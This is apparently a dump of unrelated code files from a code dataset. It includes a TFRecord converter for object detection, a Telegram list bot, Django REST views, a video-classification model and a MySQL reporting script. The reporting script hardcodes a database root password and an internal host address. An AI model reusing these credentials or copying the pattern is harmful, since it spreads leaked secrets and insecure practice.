+ '\\n')\n\n\ndef gen_image_set(data_folder, imageset):\n imageset_main_dir = os.path.join(data_folder, 'ImageSets', 'Main')\n if not os.path.exists(imageset_main_dir):\n os.makedirs(imageset_main_dir)\n imageset_file = imageset_main_dir + os.sep + imageset + '.txt'\n annotations_dir = os.path.join(data_folder, FLAGS.annotations_dir)\n with open(imageset_file, 'w') as wf:\n for root, dirs, files in os.walk(annotations_dir):\n for file in files:\n if os.path.splitext(file)[1] == '.xml':\n wf.write(os.path.splitext(file)[0] + '\\n')\n\n\ndef convert_image_format(full_path, dst_fmt='.jpg'):\n # path = 'G:/Samples/Customer/officeflower/JPEGImages/0016.bmp'\n filepath, tmpfilename = os.path.split(full_path)\n shotname, extension = os.path.splitext(tmpfilename)\n # print(filepath, shotname, extension)\n if extension != '.jpg':\n dst = os.path.join(filepath, shotname + dst_fmt)\n img = cv2.imread(full_path)\n cv2.imwrite(dst, img)\n return dst\n return full_path\n\n\ndef dict_to_tf_example(data,\n dataset_directory,\n label_map_dict,\n ignore_difficult_instances=False,\n image_subdirectory='JPEGImages'):\n \"\"\"Convert XML derived dict to 
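a serialized\n    tf.Example. Non-JPEG inputs are first re-encoded as JPEG via convert_image_format,\n    and reversed box coordinates are swapped so that xmin <= xmax and ymin <= ymax.\n    Each annotation becomes one 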
tf.Example proto.\n\n Notice that this function normalizes the bounding box coordinates provided\n by the raw .data.\n\n Args:\n data: dict holding PASCAL XML fields for a single image (obtained by\n running dataset_util.recursive_parse_xml_to_dict)\n dataset_directory: Path to root directory holding PASCAL dataset\n label_map_dict: A map from string label names to integers ids.\n ignore_difficult_instances: Whether to skip difficult instances in the\n dataset (default: False).\n image_subdirectory: String specifying subdirectory within the\n PASCAL dataset directory holding the actual image .data.\n\n Returns:\n example: The converted tf.Example.\n\n Raises:\n ValueError: if the image pointed to by .data['filename'] is not a valid JPEG\n \"\"\"\n img_path = os.path.join(data['folder'], image_subdirectory, data['filename'])\n full_path = os.path.join(dataset_directory, img_path)\n\n if not Path(full_path).exists() and 'path' in data and data['path']:\n full_path = data['path'] # for label image tools\n\n if not Path(full_path).exists():\n full_path = os.path.join(dataset_directory, 'JPEGImages', data['filename'])\n if not Path(full_path).exists():\n name, ext = os.path.splitext(full_path)\n full_path = name + '.jpg'\n if not Path(full_path).exists():\n logging.error('Image not find at %s', full_path)\n return\n print('Process', full_path)\n ## convert image format\n full_path = convert_image_format(full_path)\n\n with tf.io.gfile.GFile(full_path, 'rb') as fid:\n encoded_jpg = fid.read()\n encoded_jpg_io = io.BytesIO(encoded_jpg)\n image = PIL.Image.open(encoded_jpg_io)\n if image.format != 'JPEG':\n raise ValueError('Image format not JPEG')\n key = hashlib.sha256(encoded_jpg).hexdigest()\n\n width = int(data['size']['width'])\n height = int(data['size']['height'])\n\n xmin = []\n ymin = []\n xmax = []\n ymax = []\n classes = []\n classes_text = []\n truncated = []\n poses = []\n difficult_obj = []\n if 'object' in data:\n for obj in data['object']:\n difficult = bool(int(obj['difficult']))\n if ignore_difficult_instances and difficult:\n continue\n\n difficult_obj.append(int(difficult))\n\n xmin_val = float(obj['bndbox']['xmin'])\n ymin_val = float(obj['bndbox']['ymin'])\n xmax_val = float(obj['bndbox']['xmax'])\n ymax_val = float(obj['bndbox']['ymax'])\n if xmin_val > xmax_val:\n xmin_val, xmax_val = xmax_val, xmin_val\n if ymin_val > ymax_val:\n ymin_val, ymax_val = ymax_val, ymin_val\n\n xmin.append(xmin_val / width)\n ymin.append(ymin_val / height)\n xmax.append(xmax_val / width)\n ymax.append(ymax_val / height)\n classes_text.append(obj['name'].encode('utf8'))\n classes.append(label_map_dict[obj['name']])\n truncated.append(int(obj['truncated']))\n if 'pose' in obj and obj['pose']:\n poses.append(obj['pose'].encode('utf8'))\n else:\n poses.append(\"Unspecified\".encode('utf8'))\n\n # if want to omit the no object sample:\n # if not xmin:\n # return None\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': dataset_util.int64_feature(height),\n 'image/width': dataset_util.int64_feature(width),\n 'image/filename': dataset_util.bytes_feature(\n data['filename'].encode('utf8')),\n 'image/source_id': dataset_util.bytes_feature(\n data['filename'].encode('utf8')),\n 'image/key/sha256': dataset_util.bytes_feature(key.encode('utf8')),\n 'image/encoded': dataset_util.bytes_feature(encoded_jpg),\n 'image/format': dataset_util.bytes_feature('jpeg'.encode('utf8')),\n 'image/object/bbox/xmin': dataset_util.float_list_feature(xmin),\n 'image/object/bbox/xmax': 
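dataset_util.float_list_feature(xmax),\n        # the four bbox lists hold coordinates already normalized to [0, 1]\n        # 'image/object/bbox/xmax': 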
dataset_util.float_list_feature(xmax),\n 'image/object/bbox/ymin': dataset_util.float_list_feature(ymin),\n 'image/object/bbox/ymax': dataset_util.float_list_feature(ymax),\n 'image/object/class/text': dataset_util.bytes_list_feature(classes_text),\n 'image/object/class/label': dataset_util.int64_list_feature(classes),\n 'image/object/difficult': dataset_util.int64_list_feature(difficult_obj),\n 'image/object/truncated': dataset_util.int64_list_feature(truncated),\n 'image/object/view': dataset_util.bytes_list_feature(poses),\n }))\n return example\n\n\ndef main(_):\n data_dir = FLAGS.data_dir\n name = FLAGS.name\n data_folder = os.path.join(data_dir, name)\n annotations_dir = os.path.join(data_dir, name, FLAGS.annotations_dir)\n all_annotations = get_all_annotations(annotations_dir)\n # msg = f\"\"\"\n # data folder: {data_folder},\n # annotations dir: {annotations_dir},\n #\n # \"\"\"\n # print()\n\n train_set = os.path.join(data_folder, \"ImageSets\", \"Main\") + os.sep + 'train.txt'\n val_set = os.path.join(data_folder, \"ImageSets\", \"Main\") + os.sep + 'val.txt'\n\n if not os.path.exists(train_set):\n logging.info(\"Train set not fount, generate 80% from all data.\")\n write_annotations(all_annotations[:int(len(all_annotations) * 0.8)], data_folder, 'train')\n else:\n train_set_number = 0\n with open(train_set) as f:\n for line in f.readlines():\n if line.strip():\n train_set_number += 1\n\n logging.info(f\"Using {train_set} which has total {train_set_number} training sample\")\n\n if not os.path.exists(val_set):\n logging.info(\"Validate set not fount, generate 20% from all data.\")\n write_annotations(all_annotations[int(len(all_annotations) * 0.8):], data_folder, 'val')\n else:\n val_set_number = 0\n with open(val_set) as f:\n for line in f.readlines():\n if line.strip():\n val_set_number += 1\n\n logging.info(f\"Using {val_set} which has total {val_set_number} validate sample\")\n\n label_map_path = FLAGS.label_map_path\n if not os.path.exists(label_map_path):\n logging.info(\"Label map not fount in %s(FLAGS.label_map_path), try to find at %s\", label_map_path, data_folder)\n label_map_path = os.path.join(data_folder, FLAGS.label_map_path)\n if not os.path.exists(label_map_path):\n logging.info(\"%s not fount, failed!\", label_map_path)\n return\n\n output_path = FLAGS.output_path\n if not output_path:\n out_name = os.path.basename(data_folder)\n if not out_name:\n out_name = os.path.basename(data_dir)\n output_path = os.path.basename(out_name) + '.tfrecord'\n\n logging.info(\"Using label map path: %s.\", label_map_path)\n logging.info(\"Using annotations dir: %s.\", annotations_dir)\n logging.info(\"Using output path: %s.\", output_path)\n\n ans = input(\"Press Y to confirm, N to exit. 
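(Y/N)\")\n    # NOTE: only a literal upper-case \"N\" aborts; any other reply (including \"n\")\n    # falls through and continues. Prompt above: ans = input(\"Press Y to confirm, N to exit. 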
(Y/N)\")\n if ans == \"N\":\n return\n\n label_map_dict = label_map_util.get_label_map_dict(label_map_path)\n\n for set_name, image_set_path in zip(('train', 'val'), (train_set, val_set)):\n set_path = os.path.splitext(output_path)[0] + '_' + set_name + os.path.splitext(output_path)[1]\n logging.info(\"Generate data set %s from %s at %s\", set_name, image_set_path, set_path)\n\n examples_list = dataset_util.read_examples_list(image_set_path)\n writer = tf.io.TFRecordWriter(set_path)\n step = max(len(examples_list) // 10 // 100 * 100, 10)\n for idx, example in enumerate(examples_list):\n if idx % step == 0:\n logging.info('On image %d of %d', idx, len(examples_list))\n path = os.path.join(annotations_dir, example + '.xml')\n if not Path(path).exists():\n logging.error('Annotation xml %s not exist, press any key to continue..., q for quit.', path)\n key = input()\n if key == 'q':\n break\n else:\n continue\n\n with tf.io.gfile.GFile(path, 'r') as fid:\n xml_str = fid.read()\n xml = etree.fromstring(xml_str.encode('utf-8'))\n\n data_dic = dataset_util.recursive_parse_xml_to_dict(xml) # ['annotation']\n if 'annotation' in data_dic:\n data = data_dic['annotation']\n elif 'Annotation' in data_dic:\n data = data_dic['Annotation']\n\n # logging.info(\"Create tf example for %s.\", path)\n\n tf_example = dict_to_tf_example(data, data_folder, label_map_dict,\n FLAGS.ignore_difficult_instances)\n if tf_example:\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\n\n\"\"\"\nusage\ndata_dir: root data folder\nname: task sample name (在data_dir下面的文件夹,默认为空,代表 data_dir 就是数据集目录,而不是所有数据根目录)\n\n如果 data_dir/name/ImageSets/Main 下面没有 train.txt 或者 val.txt 则根据 4:1 比例自动生成\nlabel_map_dict: 相对于 data_dir/name/,路径为 data_dir/name/label_map_dict\n\n分成多个时间(year)文件夹的好处是,可以增量放数据,\n\n\"\"\"\n\n\"\"\"\nrelease note:\n2022/02/17:\n数据集格式:根目录, label_map.pbtxt 放在这个目录下面\n下面命令会自动生成 xxx_train.tfrecord xxx_val.tfrecord\npython create_pascal_tf_record.py --data_dir=data_folder --output_path=xxx.tfrecord\n\n\"\"\"\n\n# ----------------\n# python create_pascal_tf_record_my.py --action=imageset --data_dir=C:\\simpleSample --year=doorline --set=train\n# python create_pascal_tf_record_my.py --action=tfrecord --data_dir=C:\\simpleSample --label_map_path=.\\.data\\test.pbtxt --year=doorline --imageset=image --set=train --output_path=C:\\pascal_train.record\n# python create_pascal_tf_record_my.py --data_dir=G:\\dataset\\VOCdevkit --label_map_path=pascal_label_map.pbtxt --year=VOC2012 --set=train --output_path=G:\\pascal_train.record\n# >python create_pascal_tf_record_my.py --data_dir=H:\\Samples\\VOC\\VOCdevkit --label_map_path=.\n# \\data\\pascal_label_map.pbtxt --year=VOC2012 --imageset=train --set=train --output_path=H:\\pascal_train.record\nif __name__ == '__main__':\n app.run(main)\n\n\"\"\"\n\npython create_pascal_tf_record.py --data_dir=/media/dev/samples/officeflower --output_path=xxx.tfrecord\n\n\n\"\"\"\n","repo_name":"richaolas/TrainingTools","sub_path":"dataset_tools/create_pascal_tf_record.py","file_name":"create_pascal_tf_record.py","file_ext":"py","file_size_in_byte":14546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31040214543","text":"## 잘못생각한점 : 모든 input data를 변환할 필요가 없이 sort시키면 동일한 anagram은 동일하게 출력된다\n## 만약 sort할수 없다면 ? 
그 때는 변환기를 사용할 필요가 있을까?\n\n## 추가실수 - sorted사용시 list형태로 반환되기 때문에 다시 str화 시켜줘야하고\n## 이때 str()이 아닌 \"\".join을 활용해야한다\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n \n result=[]\n decode={}\n for i in strs:\n s=\"\".join(sorted(i))\n if decode.get(s):\n decode[s].append(i)\n else:\n decode[s]=[]\n decode[s].append(i)\n \n keys=list(decode.keys())\n \n for key in keys:\n result.append(decode[key])\n \n return result","repo_name":"ske-kr/Myalgorithm","sub_path":"etc/leetcode_GroupAnagrams.py","file_name":"leetcode_GroupAnagrams.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37318190417","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom telegram.ext import MessageHandler, Filters\nfrom telegram.error import TelegramError\nfrom telegram.error import (TelegramError, Unauthorized, BadRequest,\n TimedOut, ChatMigrated, NetworkError)\nfrom dao import Dao\nimport pprint\nimport functools\nimport datetime\nimport logging\nimport re\n\n\ndef send(func):\n @functools.wraps(func)\n def wrapper_send(*args, **kwargs):\n message = func(*args, **kwargs)\n args[2].bot.send_message(\n chat_id=args[1].effective_chat.id,\n text=message)\n return message\n return wrapper_send\n\n\ndef tag(func):\n @functools.wraps(func)\n def wrapper_tag(*args, **kw):\n tag = args[0].dao.tag_exists(args[2].args[0])\n if not tag:\n raise TelegramError(\"Wie heißt denn die List?\")\n return wrapper_tag\n\n\ndef context_args(arg_count):\n def decorator(func):\n @functools.wraps(func)\n def wrapper_context_args(*args, **kwargs):\n if (len(args[2].args) < arg_count):\n raise TelegramError(\"Leider zu wenige Argumente\")\n tag = args[2].args[0]\n command_args = args[2].args[1:]\n return func(args[0], args[1], args[2], tag, command_args)\n return wrapper_context_args\n return decorator\n\n\ndef telegram_command(func):\n @functools.wraps(func)\n def wrapper_telegram_command(self, *args, **kwargs):\n kwargs['update'] = args[0]\n kwargs['context'] = args[1]\n tag = None\n command_args = None\n if(len(args[1].args) > 0):\n tag = args[1].args[0]\n if(len(args[1].args) > 1):\n command_args = args[1].args[1:]\n return func(self, tag, command_args, **kwargs)\n return wrapper_telegram_command\n\n\nclass View(object):\n\n def __init__(self, dao):\n self.logger = logging.getLogger(\"minna.view\")\n self.dao = dao\n\n def convert_ts(self, timestamp):\n return datetime.datetime.fromtimestamp(timestamp).strftime('%d.%m.%Y')\n\n def print_column(self, table, column):\n result = ''\n for i, row in enumerate(table):\n result += '{}. 
{} \\n'.format(i+1, row[column])\n return result\n\n @send\n @telegram_command\n def all_lists_handler(self, tag, command_args, **kw):\n all_lists = self.dao.all_lists()\n return self.print_column(all_lists, 1)\n\n @send\n @telegram_command\n def add_new_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Keine Liste:(\")\n if self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste gibt es schon:)\")\n self.dao.new_list(tag)\n return \"neue Liste '{}' erstellt\".format(tag)\n\n @send\n @telegram_command\n def add_items_to_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Zu welcher Liste soll ich die Sachen\"\n \"hinzufügen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n if not command_args:\n raise TelegramError(\"Was soll ich denn hinzufügen?\")\n self.dao.add_items_to_list(command_args, tag)\n return self.print_column(self.dao.get_content(tag), 0)\n\n @send\n @telegram_command\n def get_content_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Welche Liste soll ich ausgeben?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n items = self.dao.get_content(tag)\n return self.print_column(items, 0)\n\n @send\n @telegram_command\n def delete_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Welche Liste soll ich löschen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n self.dao.delete_list(tag)\n return \"Liste {} gelöscht\".format(tag)\n\n @send\n @telegram_command\n def delete_items_from_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Von welcher Liste soll ich löschen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n if not command_args:\n raise TelegramError(\"Jetzt habe ich ja gar nix zu löschen:)\")\n save_to_delete = self.dao.items_exist(command_args, tag)\n for item in save_to_delete:\n self.dao.delete_item_from_list(item, tag)\n return \"Gelöscht von {}: {}\".format(tag, ' '.join(save_to_delete))\n\n @send\n @telegram_command\n def add_sentence_to_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Zu welcher Liste soll ich das TODO\"\n \"hinzufügen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n if not command_args:\n raise TelegramError(\"Was soll ich denn hinzufügen?\")\n item = ' '.join(command_args)\n self.dao.add_item_to_list(item, tag)\n return \"TODO '{}' zu '{}' hinzugefügt! Frohes schaffen:)\".format(item, tag)\n\n @send\n @telegram_command\n def delete_sentence_from_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Von welcher Liste soll ich löschen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n if not command_args:\n raise TelegramError(\"Jetzt habe ich ja gar nix zu löschen:)\")\n item = ' '.join(command_args)\n self.dao.delete_item_from_list(item, tag)\n return \"TODO '{}' von '{}' gelöscht! 
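Super:)\".format(item, tag)\n        # (EN) \"TODO '{}' deleted from '{}'! Great:)\" - user-facing strings stay German.\n        # return \"TODO '{}' von '{}' gelöscht! 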
Super:)\".format(item, tag)\n\n\n @send\n def error_callback(self, update, context):\n logger = logging.getLogger(\"minna.tele_error\")\n try:\n raise context.error\n except Unauthorized as e:\n logger.warning(e)\n return \"Unauthorized - \" + str(e)\n\n except BadRequest as e:\n logger.warning(e)\n return \"BadRequest - \" + str(e)\n\n except TimedOut as e:\n logger.warning(e)\n return \"TimedOut - \" + str(e)\n\n except NetworkError as e:\n logger.warning(e)\n return \"NetworkError - \" + str(e)\n\n except ChatMigrated as e:\n logger.warning(e)\n return \"ChatMigrated - \" + str(e)\n \n except TelegramError as e:\n logger.warning(e)\n return \"TeleError - \" + str(e)\n\n\n\n\n\n\n","repo_name":"CheesyB/minna","sub_path":"minna/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":6808,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70198366802","text":"import pymysql\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport datetime\n\nclass DF_to_Mysql_DB:\n def __init__(self):\n self.connect = create_engine('mysql+pymysql://root:Admin_polestar1@10.234.9.200:3306/RPT')\n\n def send_to_mysql(self, table_name, df):\n df.to_sql(name=table_name, con=self.connect, if_exists='replace', index=False)\n\nclass Mysql_Analysis:\n def __init__(self):\n self.db = pymysql.connect(host='10.234.9.200', port=3306, user ='root', password='Admin_polestar1', db='RPT')\n self.cursor = self.db.cursor()\n\n def execute_sql(self, sql_str):\n self.cursor.execute(sql_str)\n rows = self.cursor.fetchall()\n return rows\n\n def __del__(self):\n self.cursor.close()\n self.db.close()\n\n# 进行分析,取需要的数据,生成统计结果\nana_conn = Mysql_Analysis()\n# 抓取72小时内每张卡的最后一次刷卡记录,筛选出最后一次是刷进工厂的记录,并补上相应的员工信息\nsql_ana_detail = '''\nselect lg.card_no, lg.last_grant_time, tp.logical_device, tp.lname, tp.fname, tp.company, tp.department from\n(select card_no, max(event_time) last_grant_time from prowatch_data\nwhere logical_device like 'PSCD%Gate%' and event_time > date_sub(CURRENT_TIMESTAMP(), interval '3 00:00:00' day_second) and status = 'Active'\ngroup by card_no) lg left join prowatch_data tp on (lg.card_no = tp.card_no and lg.last_grant_time = tp.event_time) where lower(tp.logical_device) like '%in'\n'''\nrslt_data = ana_conn.execute_sql(sql_ana_detail)\n\nlast_refresh_time = ana_conn.execute_sql(\"select last_end FROM config_data_extraction where program = 'prowatch_data_increase_get'\")\nlast_refresh_time = last_refresh_time[0][0]\nlast_refresh_time2 = last_refresh_time - datetime.timedelta(hours=8)\n\n# 将数据转为DataFrame,整理后写入Mysql数据库\nrslt_df_detail = pd.DataFrame(rslt_data)\nrslt_df_detail.columns = ['Card_No','Enter_Timestamp','Enter_Location','LNAME','FNAME','Company','Department']\nrslt_df_detail['Refresh_Timestamp'] = last_refresh_time\nrslt_df_detail['Refresh_Timestamp2'] = last_refresh_time2\n\nfor i in range(len(rslt_df_detail)):\n rslt_df_detail.iloc[i,6] = rslt_df_detail.iloc[i,6].upper().replace('\\n','').replace('\\r','').replace(' ','')\n\nwrite_conn = DF_to_Mysql_DB()\nwrite_conn.send_to_mysql('in_plant_details', rslt_df_detail)\n\nprint(1)\n\n\n\n\n\n\n","repo_name":"zjustranger/Simple_Dev_PSCD","sub_path":"Check_Attendance/refresh_report_to_DB.py","file_name":"refresh_report_to_DB.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37611136796","text":"from fastapi.params import Depends\nfrom sqlalchemy.orm import Session\n\nfrom 
db.connection import get_db\nfrom db.models import Student\n\n\nclass StudentRepository:\n\n def __init__(self, db: Session = Depends(get_db)):\n self.db = db\n\n def list(self) -> list[Student]:\n return self.db.query(Student).all()\n\n def create(self, name: str, email: str) -> Student:\n db_student = Student(name=name, email=email)\n self.db.add(db_student)\n self.db.commit()\n self.db.refresh(db_student)\n return db_student\n","repo_name":"juanbenitopr/taller_fastapi","sub_path":"repositories/student_repository.py","file_name":"student_repository.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"42289826983","text":"n=int(input())\ns=list(input())\nl='ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\ndef left(ini,cur):\n lin=abs(ini-cur)\n nlin=ini+(26-cur)\n return min(lin,nlin)\n\ndef right(ini,cur):\n lin=abs(ini-cur)\n nlin=(26-ini)+cur\n return min(lin,nlin)\n\n\nA=0;C=2;T=19;G=6\n\n\n\nres=100000\nfor i in range(n-3):\n count=0\n a=l.index(s[i])\n c=l.index(s[i+1])\n t=l.index(s[i+2])\n g=l.index(s[i+3])\n\n if A<=a:count+=left(A,a)\n else:count+=right(A,a)\n if C<=c:count+=left(C,c)\n else:count+=right(C,c)\n if T<=t:count+=left(T,t)\n else:count+=right(T,t)\n if G<=g:count+=left(G,g)\n else:count+=right(G,g)\n\n res=min(res,count)\nprint(res)\n","repo_name":"Shovon588/Programming","sub_path":"Codeforces with Python/11514.py","file_name":"11514.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"41772975676","text":"\"\"\"View module for handling requests about artists\"\"\"\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom tunaapi.models import Artist\n\nclass ArtistView(ViewSet):\n \"\"\"Artist View\"\"\"\n\n def retrieve(self, request, pk):\n \"\"\"Handle GET requests for single artist\n\n Returns:\n Reponse - JSON serialized artist\n \"\"\"\n try:\n artist = Artist.objects.get(pk=pk)\n song_count = artist.songs.count()\n artist.song_count = song_count\n serializer = ArtistSerializer(artist)\n return Response(serializer.data)\n except Artist.DoesNotExist as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)\n\n def list(self, request):\n \"\"\"Handle GET requests to get all artists\n\n Returns:\n Reponse - JSON serialized list of artists\n \"\"\"\n artists = Artist.objects.all()\n serializer = ArtistSerializer(artists, many=True)\n return Response(serializer.data)\n\n def create(self, request):\n \"\"\"Handle POST requests to create an artist\n\n Returns:\n Reponse - JSON serialized artist instance\n \"\"\"\n artist = Artist.objects.create(\n name = request.data['name'],\n age = request.data['age'],\n bio = request.data['bio'],\n )\n serializer = ArtistSerializer(artist)\n return Response(serializer.data)\n\n def update(self, request, pk):\n \"\"\"Handles PUT requests for an artist\n\n Returns:\n Response - JSON serialized artist instance\n \"\"\"\n\n artist = Artist.objects.get(pk=pk)\n artist.name = request.data['name']\n artist.age = request.data['age']\n artist.bio = request.data['bio']\n artist.save()\n\n serializer = ArtistSerializer(artist)\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n \"\"\"Handles DELETE requests for an artist\n\n Returns:\n Response - Empty body with 204 status code\n 
\"\"\"\n artist = Artist.objects.get(pk=pk)\n artist.delete()\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n\nclass ArtistSerializer(serializers.ModelSerializer):\n \"\"\"JSON serializer for artists\n \"\"\"\n song_count = serializers.IntegerField(default=None)\n class Meta:\n model = Artist\n fields = ('id', 'name', 'age', 'bio',\n 'song_count', 'songs')\n depth = 1\n","repo_name":"WhitleyBeers/django-rest-api-assessment","sub_path":"tunaapi/views/artists.py","file_name":"artists.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1108374799","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom model.pytorch_i3d import InceptionI3d, Unit3D\nfrom base_learner import Reshape\n\n\n# I3D + LSTM\n# Long Short-Term Memory\n# https://www.mitpressjournals.org/doi/pdfplus/10.1162/neco.1997.9.8.1735\nclass InceptionI3dLstm(nn.Module):\n\n def __init__(self, input_size, num_classes=2, in_channels=3, dropout_keep_prob=0.5, freeze_i3d=False):\n super().__init__()\n print(\"Initialize the I3D+LSTM model...\")\n\n # Set the first dimension of the input size to be 1, to reduce the amount of computation\n input_size[0] = 1\n\n # I3D input has shape (batch_size, 3, 36, 224, 224)\n # (batch_size, channel, time, height, width)\n a = torch.tensor(np.zeros(input_size), dtype=torch.float32)\n print(\"Input size:\")\n print(\"\\t\", a.size())\n\n # I3D\n self.i3d = InceptionI3d(num_classes=num_classes, in_channels=in_channels)\n if freeze_i3d:\n print(\"Freeze I3D model\")\n self.i3d.train(False)\n\n # I3D output has shape (batch_size, 1024, 5, 7, 7)\n b = self.i3d(a, no_logits=True)\n print(\"I3D model output size:\")\n print(\"\\t\", b.size())\n\n # LSTM\n bs = b.size()\n self.lstm = nn.LSTM(bs[1]*bs[3]*bs[4], 128, num_layers=1, batch_first=True)\n\n # LSTM output has shape (batch_size, 128, 5, 1, 1)\n b = b.transpose(1, 2) # swap time and channel\n self.lstm_reshape_before = Reshape((bs[2], -1))\n c = self.lstm_reshape_before(b)\n c, _ = self.lstm(c)\n cs = c.size()\n self.lstm_reshape_after = Reshape((cs[1], cs[2], 1, 1))\n c = self.lstm_reshape_after(c)\n c = c.transpose(1, 2) # swap time and channel back\n print(\"LSTM model output size:\")\n print(\"\\t\", c.size())\n\n # Logits\n self.dropout = nn.Dropout(dropout_keep_prob)\n self.logits_in_channels = c.size(1)\n self.logits = Unit3D(in_channels=self.logits_in_channels, output_channels=num_classes,\n kernel_shape=[1, 1, 1],\n padding=0,\n activation_fn=None,\n use_batch_norm=False,\n use_bias=True,\n name='logits')\n d = self.logits(self.dropout(c)).squeeze(3).squeeze(3)\n\n # Final output has shape (batch_size, num_classes, time)\n print(\"Final layer output size:\")\n print(\"\\t\", d.size())\n\n def get_i3d_model(self):\n return self.i3d\n\n def replace_logits(self, num_classes):\n self.i3d.replace_logits(num_classes)\n self.logits = Unit3D(in_channels=self.logits_in_channels, output_channels=num_classes,\n kernel_shape=[1, 1, 1],\n padding=0,\n activation_fn=None,\n use_batch_norm=False,\n use_bias=True,\n name='logits')\n\n def delete_i3d_logits(self):\n print(\"Delete logits in the I3D model...\")\n del self.i3d.logits\n del self.i3d.avg_pool\n del self.i3d.dropout\n\n def forward(self, x):\n x = self.i3d(x, no_logits=True)\n x = x.transpose(1, 2) # swap time and channel\n x = self.lstm_reshape_before(x)\n x, _ = self.lstm(x)\n x = self.lstm_reshape_after(x)\n x = x.transpose(1, 2) # swap time and channel back\n x 
= self.logits(self.dropout(x)).squeeze(3).squeeze(3)\n return x\n","repo_name":"CMU-CREATE-Lab/deep-smoke-machine","sub_path":"back-end/www/model/pytorch_i3d_lstm.py","file_name":"pytorch_i3d_lstm.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"3"} +{"seq_id":"25978132187","text":"\"\"\"\nTMEnvironment\n\"\"\"\nimport enum\nimport types\nfrom abc import abstractmethod\nfrom itertools import zip_longest\nfrom random import shuffle\nfrom typing import Type, Optional, Union, Tuple, List, TypeVar\n\nimport numpy as np\nfrom more_itertools import chunked\n\nfrom tripmaster import T\n\nObsType = TypeVar(\"ObsType\")\nActType = TypeVar(\"ActType\")\n\n\nfrom tripmaster import logging\n\nlogger = logging.getLogger()\n# try:\n# import gym\n# from gym.core import ObsType, ActType\n# except:\n# pass\n\nfrom tripmaster.core.components.machine.data_traits import TMSampleMemoryTraits, TMSampleBatchTraits\nfrom tripmaster.core.components.modeler.memory_batch import TMMemory2BatchModeler\nfrom tripmaster.core.components.modeler.modeler import TMModeler\nfrom tripmaster.core.concepts.component import TMSerializableComponent, TMConfigurable, TMSerializable\nfrom tripmaster.core.concepts.contract import TMContract, TMContractChannel\nfrom tripmaster.core.concepts.data import TMDataChannel, TMDataStream, TMDataLevel\nimport math\n\nfrom tripmaster.core.concepts.hyper_params import TMHyperParams\nfrom tripmaster.core.concepts.scenario import TMScenario\n\n\nclass TMEnvironmentInterface:\n\n\n\n\n\n def accumulated_reward(self, rewards):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n pass\n\n def future_reward(self, rewards):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n pass\n\n def truth(self):\n \"\"\"\n return the expected truth final observation of the environment\n \"\"\"\n return None\n\n\nclass TMEnvironment(TMSerializableComponent):\n \"\"\"\n TMEnvironment\n \"\"\"\n\n def __init__(self, hyper_params,\n scenario=TMScenario.Learning,\n eval=False,\n states=None):\n super().__init__(hyper_params=hyper_params,\n states=states)\n\n if not self.hyper_params.gamma:\n self.hyper_params.gamma = 1.0\n\n self._scenario = scenario\n self._eval = eval\n\n @property\n def scenario(self):\n return self._scenario\n\n @property\n def eval(self):\n return self._eval\n \n # @property \n # def device(self):\n # return self._device\n\n # @device.setter\n # def device(self, value):\n # self._device = value\n\n def accumulated_reward(self, rewards):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n acc_reward = 0\n for idx, reward in enumerate(rewards):\n if reward is not None:\n acc_reward += math.pow(self.hyper_params.gamma, idx) * reward\n return acc_reward\n\n def future_reward(self, explored):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n \n weighted_reward 